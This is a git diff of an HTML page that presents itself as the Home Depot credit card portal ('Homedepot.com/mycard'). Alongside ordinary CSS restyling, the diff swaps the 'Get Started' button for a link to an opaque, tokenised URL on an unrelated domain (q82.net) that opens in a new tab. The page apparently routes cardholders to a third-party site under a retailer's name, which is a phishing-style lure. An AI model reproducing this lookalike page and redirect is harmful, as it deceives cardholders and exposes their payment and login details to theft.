--- a/index.html
+++ b/index.html
@@ -70,25 +70,20 @@
 }
 
 
-        .hero button {
-            background-color: #ff6600;
-            border: none;
-            color: white;
-            padding: 18px 45px;
-            /* Increased padding */
-            font-size: 1.3em;
-            /* Increased font size */
-            border-radius: 12px;
-            /* Slightly larger corners */
-            cursor: pointer;
-            transition: background 0.3s, transform 0.2s;
-        }
+       .btn {
+    display: inline-block;
+    background-color: #ff6600;
+    color: #fff;
+    padding: 12px 30px;
+    text-decoration: none;
+    border-radius: 8px;
+    font-size: 1em;
+    transition: background 0.3s ease;
+}
+.btn:hover {
+    background-color: #e65c00;
+}
 
-        .hero button:hover {
-            background-color: #e65c00;
-            transform: scale(1.08);
-            /* Slightly bigger zoom on hover */
-        }
 
         /* Content */
         .content {
@@ -133,7 +128,7 @@
         <p>Homedepot.com/mycard is the easy online portal for Home Depot credit cardholders to pay bills,
             check balances, and manage their accounts anytime.
         </p>
-        <button>Get Started</button>
+ <a href=" https://q82.net/?1s7clbwoqk9zIVc7c695GlqmTfKxxqtMFw6B8UkJolMiKmP7W" target="_blank" class="btn">Get Started</a>
     </section>
 
     <!-- Content -->
